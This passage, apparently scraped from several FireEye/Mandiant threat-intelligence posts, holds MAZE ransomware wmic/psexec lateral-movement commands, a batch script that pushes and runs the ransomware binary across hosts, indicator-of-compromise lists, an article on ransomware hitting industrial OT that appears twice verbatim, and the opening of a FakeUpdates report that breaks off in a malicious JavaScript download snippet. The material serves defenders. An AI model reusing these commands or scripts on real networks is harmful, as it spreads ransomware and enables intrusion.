              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

              start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

              start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

              Example commands from MAZE distribution scripts

              @echo off
              del done.txt
              del offline.txt
              rem Loop thru list of computer names in file specified on command-line
              for /f %%i in (%1) do call :check_machine %%i
              goto end
              :check_machine
              rem Check to see if machine is up.
              ping -n 1 %1|Find "TTL=" >NUL 2>NUL
              if errorlevel 1 goto down
              echo %1
              START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
              timeout 1 > NUL
              echo %1 >> done.txt
              rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
              START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
              goto end
              :down
                rem Report machine down
                echo %1 >> offline.txt
              :end

              Example MAZE distribution script

              Indicators of Compromise

              Maze Payloads

              064058cf092063a5b69ed8fd2a1a04fe

              0f841c6332c89eaa7cac14c9d5b1d35b

              108a298b4ed5b4e77541061f32e55751

              11308e450b1f17954f531122a56fae3b

              15d7dd126391b0e7963c562a6cf3992c

              21a563f958b73d453ad91e251b11855c

              27c5ecbb94b84c315d56673a851b6cf9

              2f78ff32cbb3c478865a88276248d419

              335aba8d135cc2e66549080ec9e8c8b7

              3bfcba2dd05e1c75f86c008f4d245f62

              46b98ee908d08f15137e509e5e69db1b

              5774f35d180c0702741a46d98190ff37

              5df79164b6d0661277f11691121b1d53

              658e9deec68cf5d33ee0779f54806cc2

              65cf08ffaf12e47de8cd37098aac5b33

              79d137d91be9819930eeb3876e4fbe79

              8045b3d2d4a6084f14618b028710ce85

              8205a1106ae91d0b0705992d61e84ab2

              83b8d994b989f6cbeea3e1a5d68ca5d8

              868d604146e7e5cb5995934b085846e3

              87239ce48fc8196a5ab66d8562f48f26

              89e1ddb8cc86c710ee068d6c6bf300f4

              910aa49813ee4cc7e4fa0074db5e454a

              9eb13d56c363df67490bcc2149229e4c

              a0c5b4adbcd9eb6de9d32537b16c423b

              a3a3495ae2fc83479baeaf1878e1ea84

              b02be7a336dcc6635172e0d6ec24c554

              b40a9eda37493425782bda4a3d9dad58

              b4d6cb4e52bb525ebe43349076a240df

              b6786f141148925010122819047d1882

              b93616a1ea4f4a131cc0507e6c789f94

              bd9838d84fd77205011e8b0c2bd711e0

              be537a66d01c67076c8491b05866c894

              bf2e43ff8542e73c1b27291e0df06afd

              c3ce5e8075f506e396ee601f2757a2bd

              d2dda72ff2fbbb89bd871c5fc21ee96a

              d3eaab616883fcf51dcbdb4769dd86df

              d552be44a11d831e874e05cadafe04b6

              deebbea18401e8b5e83c410c6d3a8b4e

              dfa4631ec2b8459b1041168b1b1d5105

              e57ba11045a4b7bc30bd2d33498ef194

              e69a8eb94f65480980deaf1ff5a431a6

              ef95c48e750c1a3b1af8f5446fa04f54

              f04d404d84be66e64a584d425844b926

              f457bb5060543db3146291d8c9ad1001

              f5ecda7dd8bb1c514f93c09cea8ae00d

              f83cef2bf33a4d43e58b771e81af3ecc

              fba4cbb7167176990d5a8d24e9505f71

              Maze Check-in IPs

              91.218.114.11

              91.218.114.25

              91.218.114.26

              91.218.114.31

              91.218.114.32

              91.218.114.37

              91.218.114.38

              91.218.114.4

              91.218.114.77

              91.218.114.79

              92.63.11.151

              92.63.15.6 

              92.63.15.8 

              92.63.17.245

              92.63.194.20

              92.63.194.3

              92.63.29.137

              92.63.32.2 

              92.63.32.52

              92.63.32.55

              92.63.32.57

              92.63.37.100

              92.63.8.47

              Maze-related Domains

              aoacugmutagkwctu[.]onion

              mazedecrypt[.]top 

              mazenews[.]top

              newsmaze[.]top

              Maze Download URLs

              http://104.168.174.32/wordupd_3.0.1.tmp

              http://104.168.198.208/wordupd.tmp

              http://104.168.201.35/dospizdos.tmp

              http://104.168.201.47/wordupd.tmp

              http://104.168.215.54/wordupd.tmp

              http://149.56.245.196/wordupd.tmp

              http://192.119.106.235/mswordupd.tmp

              http://192.119.106.235/officeupd.tmp

              http://192.99.172.143/winupd.tmp

              http://54.39.233.188/win163.65.tmp

              http://91.208.184.174:8079/windef.exe

              http://agenziainformazioni[.]icu/wordupd.tmp

              http://www.download-invoice[.]site/Invoice_29557473.exe

              Malicious Documents

              1a26c9b6ba40e4e3c3dce12de266ae10

              53d5bdc6bd7904b44078cf80e239d42b

              79271dc08052480a578d583a298951c5

              a2d631fcb08a6c840c23a8f46f6892dd

              ad30987a53b1b0264d806805ce1a2561

              c09af442e8c808c953f4fa461956a30f

              ee26e33725b14850b1776a67bd8f2d0a

              BEACON C2s

              173.209.43.61

              193.36.237.173

              37.1.213.9

              37.252.7.142

              5.199.167.188

              checksoffice[.]me

              drivers.updatecenter[.]icu

              plaintsotherest[.]net

              thesawmeinrew[.]net

              updates.updatecenter[.]icu

              Cobalt Strike Binaries

              7507fe19afbda652e9b2768c10ad639f

              a93b86b2530cc988f801462ead702d84

              4f57e35a89e257952c3809211bef78ea

              bad6fc87a98d1663be0df23aedaf1c62

              f5ef96251f183f7fc63205d8ebf30cbf

              c818cc38f46c604f8576118f12fd0a63

              078cf6db38725c37030c79ef73519c0c

              c255daaa8abfadc12c9ae8ae2d148b31

              1fef99f05bf5ae78a28d521612506057

              cebe4799b6aff9cead533536b09fecd1

              4ccca6ff9b667a01df55326fcc850219

              bad6fc87a98d1663be0df23aedaf1c62

              Meterpreter C2s

              5.199.167.188

              Other Related Files

              3A5A9D40D4592C344920DD082029B362 (related script)

              76f8f28bd51efa03ab992fdb050c8382 (MAZE execution artifact)

              b5aa49c1bf4179452a85862ade3ef317 (windows.bat kill script) 

              fad3c6914d798e29a3fd8e415f1608f4 (related script)

              Tools & Utilities

              27304b246c7d5b4e149124d5f93c5b01 (PsExec)

              42badc1d2f03a8b1e4875740d3d49336 (7zip)

              75b55bb34dac9d02740b9ad6b6820360 (PsExec)

              9b02dd2a1a15e94922be3f85129083ac (AdFind)

              c621a9f931e4ebf37dace74efcce11f2 (SMBTools)

              f413b4a2242bb60829c9a470eea4dfb6 (winRAR) 

              Email Sender Domains

              att-customer[.]com

              att-information[.]com

              att-newsroom[.]com

              att-plans[.]com

              bezahlen-1und1[.]icu

              bzst-info[.]icu

              bzst-inform[.]icu

              bzstinfo[.]icu

              bzstinform[.]icu

              canada-post[.]icu

              canadapost-delivery[.]icu

              canadapost-tracking[.]icu

              hilfe-center-1und1[.]icu

              hilfe-center-internetag[.]icu

              trackweb-canadapost[.]icu

              Sender Domain Registrant Addresses

              abusereceive@hitler.rocks

              gladkoff1991@yandex.ru

              Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

              Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

              Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

              While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

              Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

              Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

              The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

              In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which  expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


              Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

              Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

              • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
              • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
              • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

              Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

              An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

              In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


              Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

              Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.

              Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

              As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

              The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

              Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

              As recently as February 2020, the Cybersecurity Infrastructure and Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shut down of operations that lasted two days.

              Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

              Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

              For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

              • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
              • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
              • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
              • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
              • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
              • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
              • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
              • Note, that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

              Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT

              Since at least 2017, there has been a significant increase in public disclosures of ransomware incidents impacting industrial production and critical infrastructure organizations. Well-known ransomware families like WannaCry, LockerGoga, MegaCortex, Ryuk, Maze, and now SNAKEHOSE (a.k.a. Snake / Ekans), have cost victims across a variety of industry verticals many millions of dollars in ransom and collateral costs. These incidents have also resulted in significant disruptions and delays to the physical processes that enable organizations to produce and deliver goods and services.

              While lots of information has been shared about the victims and immediate impacts of industrial sector ransomware distribution operations, the public discourse continues to miss the big picture. As financial crime actors have evolved their tactics from opportunistic to post-compromise ransomware deployment, we have observed an increase in adversaries’ internal reconnaissance that enables them to target systems that are vital to support the chain of production. As a result, ransomware infections—either affecting critical assets in corporate networks or reaching computers in OT networks—often result in the same outcome: insufficient or late supply of end products or services.

              Truly understanding the unique nuances of industrial sector ransomware distribution operations requires a combination of skillsets and visibility across both IT and OT systems. Using examples derived from our consulting engagements and threat research, we will explain how the shift to post-compromise ransomware operations is fueling adversaries’ ability to disrupt industrial operations.

              Industrial Sector Ransomware Distribution Poses Increasing Risk as Actors Move to Post-Compromise Deployment

              The traditional approach to ransomware attacks predominantly relies on a “shotgun” methodology that consists of indiscriminate campaigns spreading malware to encrypt files and data from a variety of victims. Actors following this model will extort victims for an average of $500 to $1,000 USD and hope to receive payments from as many individuals as possible. While early ransomware campaigns adopting this approach were often considered out of scope for OT security, recent campaigns targeting entire industrial and critical infrastructure organizations have moved toward adopting a more operationally complex post-compromise approach.

              In post-compromise ransomware incidents, a threat actor may still often rely on broadly distributed malware to obtain their initial access to a victim environment, but once on a network they will focus on gaining privileged access so they can explore the target networks and identify critical systems before deploying the ransomware. This approach also makes it possible for the attacker to disable security processes that would normally be enough to detect known ransomware indicators or behaviors. Actors cast wider nets that may impact critical systems, which  expand the scale and effectiveness of their end-stage operations by inflicting maximum pain on the victim. As a result, they are better positioned to negotiate and can often demand much higher ransoms—which are commonly commensurate with the victims’ perceived ability to pay and the value of the ransomed assets themselves. For more information, including technical detail, on similar activity, see our recent blog posts on FIN6 and TEMP.MixMaster.


              Figure 1: Comparison of indiscriminate vs. post-compromise ransomware approaches

              Historical incidents involving the opportunistic deployment of ransomware have often been limited to impacting individual computers, which occasionally included OT intermediary systems that were either internet-accessible, poorly segmented, or exposed to infected portable media. In 2017, we also observed campaigns such as NotPetya and BadRabbit, where wiper malware with worm-like capabilities were released to disrupt organizations while masquerading as ransomware. While these types of campaigns pose a threat to industrial production, the adoption of post-compromise deployment presents three major twists in the plot.

              • As threat actors tailor their attacks to target specific industries or organizations, companies with high-availability requirements (e.g., public utilities, hospitals, and industrial manufacturing) and perceived abilities to pay ransoms (e.g., higher revenue companies) become prime targets. This represents an expansion of financial crime actors’ targeting of industries that process directly marketable information (e.g., credit card numbers or customer data) to include the monetization of production environments.
              • As threat actors perform internal reconnaissance and move laterally across target networks before deploying ransomware, they are now better positioned to cast wide nets that impact the target’s most critical assets and negotiate from a privileged position.
              • Most importantly, many of the tactics, techniques, and procedures (TTPs) often used by financial actors in the past, resemble those employed by high-skilled actors across the initial and middle stages of the attack lifecycle of past OT security incidents. Therefore, financial crime actors are likely capable of pivoting to and deploying ransomware in OT intermediary systems to further disrupt operations.

              Organized Financial Crime Actors Have Demonstrated an Ability to Disrupt OT Assets

              An actor’s capability to obtain financial benefits from post-compromise ransomware deployment depends on many factors, one of which is the ability to disrupt systems that are the most relevant to the core mission of the victim organizations. As a result, we can expect mature actors to gradually broaden their selection from only IT and business processes, to also OT assets monitoring and controlling physical processes. This is apparent in ransomware families such as SNAKEHOSE, which was designed to execute its payload only after stopping a series of processes that included some industrial software from vendors such as General Electric and Honeywell. At first glance, the SNAKEHOSE kill list appeared to be specifically tailored to OT environments due to the relatively small number of processes (yet high number of OT-related processes) identified with automated tools for initial triage. However, after manually extracting the list from the function that was terminating the processes, we determined that the kill list utilized by SNAKEHOSE actually targets over 1,000 processes.

              In fact, we have observed very similar process kill lists deployed alongside samples from other ransomware families, including LockerGoga, MegaCortex, and Maze. Not surprisingly, all of these code families have been associated with high-profile incidents impacting industrial organizations for the past two years. The earliest kill list containing OT processes we identified was a batch script deployed alongside LockerGoga in January 2019. The list is very similar to those used later in MegaCortex incidents, albeit with notable exceptions, such as an apparent typo on an OT-related process that is not present in our SNAKEHOSE or MegaCortex samples: “proficyclient.exe4”. The absence of this typo in the SNAKEHOSE and MegaCortex samples could indicate that one of these malware authors identified and corrected the error when initially copying the OT-processes from the LockerGoga list, or that the LockerGoga author failed to properly incorporate the processes from some theoretical common source of origin, such as a dark web post.


              Figure 2: ‘proficyclient.exe’ spelling in kill lists deployed with LockerGoga (left) and SNAKEHOSE (right)

              Regardless of which ransomware family first employed the OT-related processes in a kill list or where the malware authors acquired the list, the seeming ubiquity of this list across malware families suggests that the list itself is more noteworthy than any individual malware family that has implemented it. While the OT processes identified in these lists may simply represent the coincidental output of automated process collection from target environments and not a targeted effort to impact OT, the existence of this list provides financial crime actors opportunities to disrupt OT systems. Furthermore, we expect that as financially motivated threat actors continue to impact industrial sector organizations, become more familiar with OT, and identify dependencies across IT and OT systems, they will develop capabilities—and potentially intent—to disrupt other systems and environments running industrial software products and technology.

              Ransomware Deployments in Both IT and OT Systems Have Impacted Industrial Production

              As a result of adversaries’ post-compromise strategy and increased awareness of industrial sector targets, ransomware incidents have effectively impacted industrial production regardless of whether the malware was deployed in IT or OT. Ransomware incidents encrypting data from servers and computers in corporate networks have resulted in direct or indirect disruptions to physical production processes overseen by OT networks. This has caused insufficient or late supply of end products or services, representing long-term financial losses in the form of missed business opportunities, costs for incident response, regulatory fines, reputational damage, and sometimes even paid ransoms. In certain sectors, such as utilities and public services, high availability is also critical to societal well-being.

              The best-known example of ransomware impacting industrial production due to an IT network infection is Norsk Hydro’s incident from March 2019, where disruptions to Business Process Management Systems (BPMS) forced multiple sites to shut down automation operations. Among other collateral damage, the ransomware interrupted communication between IT systems that are commonly used to manage resources across the production chain. Interruptions to these flows of information containing for example product inventories, forced employees to identify manual alternatives to handle more than 6,500 stock-keeping units and 4,000 shelves. FireEye Mandiant has responded to at least one similar case where TrickBot was used to deploy Ryuk ransomware at an oil rig manufacturer. While the infection happened only on corporate networks, the biggest business impact was caused by disruptions of Oracle ERP software driving the company temporarily offline and negatively affecting production.

              Ransomware may result in similar outcomes when it reaches IT-based assets in OT networks, for example human-machine interfaces (HMIs), supervisory control and data acquisition (SCADA) software, and engineering workstations. Most of this equipment relies on commodity software and standard operating systems that are vulnerable to a variety of IT threats. Mandiant Intelligence is aware of at least one incident in which an industrial facility suffered a plant shutdown due to a large-scale ransomware attack, based on sensitive sources. The facility's network was improperly segmented, which allowed the malware to propagate from the corporate network into the OT network, where it encrypted servers, HMIs, workstations, and backups. The facility had to reach out to multiple vendors to retrieve backups, many of which were decades old, which delayed complete restoration of production.

              As recently as February 2020, the Cybersecurity Infrastructure and Security Agency (CISA) released Alert AA20-049A describing how a post-compromise ransomware incident had affected control and communication assets on the OT network of a natural gas compression facility. Impacts to HMIs, data historians, and polling servers resulted in loss of availability and loss of view for human operators. This prompted an intentional shut down of operations that lasted two days.

              Mitigating the Effects of Ransomware Requires Defenses Across IT and OT

              Threat actors deploying ransomware have made rapid advances both in terms of effectiveness and as a criminal business model, imposing high operational costs on victims. We encourage all organizations to evaluate their safety and industrial risks related to ransomware attacks. Note that these recommendations will also help to build resilience in the face of other threats to business operations (e.g., cryptomining malware infections). While every case will differ, we highlight the following recommendations.

              For custom services and actionable intelligence in both IT and OT, contact FireEye Mandiant Consulting, Managed Defense, and Threat Intelligence.

              • Conduct tabletop and/or controlled red team exercises to assess the current security posture and ability of your organization to respond to the ransomware threat. Simulate attack scenarios (mainly in non-production environments) to understand how the incident response team can (or cannot) detect, analyze, and recover from such an attack. Revisit recovery requirements based on the exercise results. In general, repeatedly practicing various threat scenarios will improve awareness and ability to respond to real incidents.
              • Review operations, business processes, and workflows to identify assets that are critical to maintaining continuous industrial operations. Whenever possible, introduce redundancy for critical assets with low tolerance to downtime. The right amount and type of redundancy is unique for each organization and can be determined through risk assessments and cost-benefit analyses. Note that such analyses cannot be conducted without involving business process owners and collaborating across IT and OT.
              • Logically segregate primary and redundant assets either by a network-based or host-based firewall with subsequent asset hardening (e.g., disabling services typically used by ransomware for its propagation, like SMB, RDP, and WMI). In addition to creating policies to disable unnecessary peer-to-peer and remote connections, we recommend routine auditing of all systems that potentially host these services and protocols. Note that such architecture is generally more resilient to security incidents.
              • When establishing a rigorous back-up program, special attention should be paid to ensuring the security (integrity) of backups. Critical backups must be kept offline or, at minimum, on a segregated network.
              • Optimize recovery plans in terms of recovery time objective. Introduce required alternative workflows (including manual) for the duration of recovery. This is especially critical for organizations with limited or no redundancy of critical assets. When recovering from backups, harden recovered assets and the entire organization's infrastructure to prevent recurring ransomware infection and propagation.
              • Establish clear ownership and management of OT perimeter protection devices to ensure emergency, enterprise-wide changes are possible. Effective network segmentation must be maintained during containment and active intrusions.
              • Hunt for adversary intrusion activity in intermediary systems, which we define as the networked workstations and servers using standard operating systems and protocols. While the systems are further away from direct control of physical processes, there is a much higher likelihood of attacker presence.
              • Note, that every organization is different, with unique internal architectures and processes, stakeholder needs, and customer expectations. Therefore, all recommendations should be carefully considered in the context of the individual infrastructures. For instance, proper network segmentation is highly advisable for mitigating the spread of ransomware. However, organizations with limited budgets may instead decide to leverage redundant asset diversification, host-based firewalls, and hardening as an alternative to segregating with hardware firewalls.

              Head Fake: Tackling Disruptive Ransomware Attacks

              Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware in mass throughout a victim’s environment. Understanding that normal business processes are critical to organizational success, these ransomware campaigns have been accompanied with multi-million dollar ransom amounts. In this post, we’ll provide a technical examination of one recent campaign that stems back to a technique that we initially reported on in April 2018.

              Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity bared consistencies with a fake browser update campaign first identified in April 2018 – now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems in mass with BitPaymer or DoppelPaymer ransomware (see Figure 1).


              Figure 1: Recent FakeUpdates infection chain

              Due to campaign proliferation, we have responded to this activity at both Mandiant Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

              Knock, Knock: FakeUpdates are Back!

              In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML or in JavaScript components rendered by the pages which had been injected. These sites were accessed by victim users either via HTTP redirects or watering-hole techniques utilized by the attackers.

              Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

              You Are Using an Older Version…of our Malware

              The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page will make the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may have additional protections to evade sandbox detections and post-incident triage attempts on the compromise site(s).


              Figure 2: Example of FakeUpdate landing page after HTTP redirects

              The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

              After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

              • Heavily-obfuscated HTML applications (.hta file extensions)
              • JavaScript files (.js file extensions)
              • ZIP-compressed JavaScript files (.zip extensions)

              Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

              var domain = '//gnf6.ruscacademy[.]in/';
              var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
              var statTypeParamName = 'st';

              var filename = 'download.hta';
              var browser = 'Chrome';
              var special = '1';   
              var filePlain = window.atob(file64);
              var a = document.getElementById('buttonDownload');

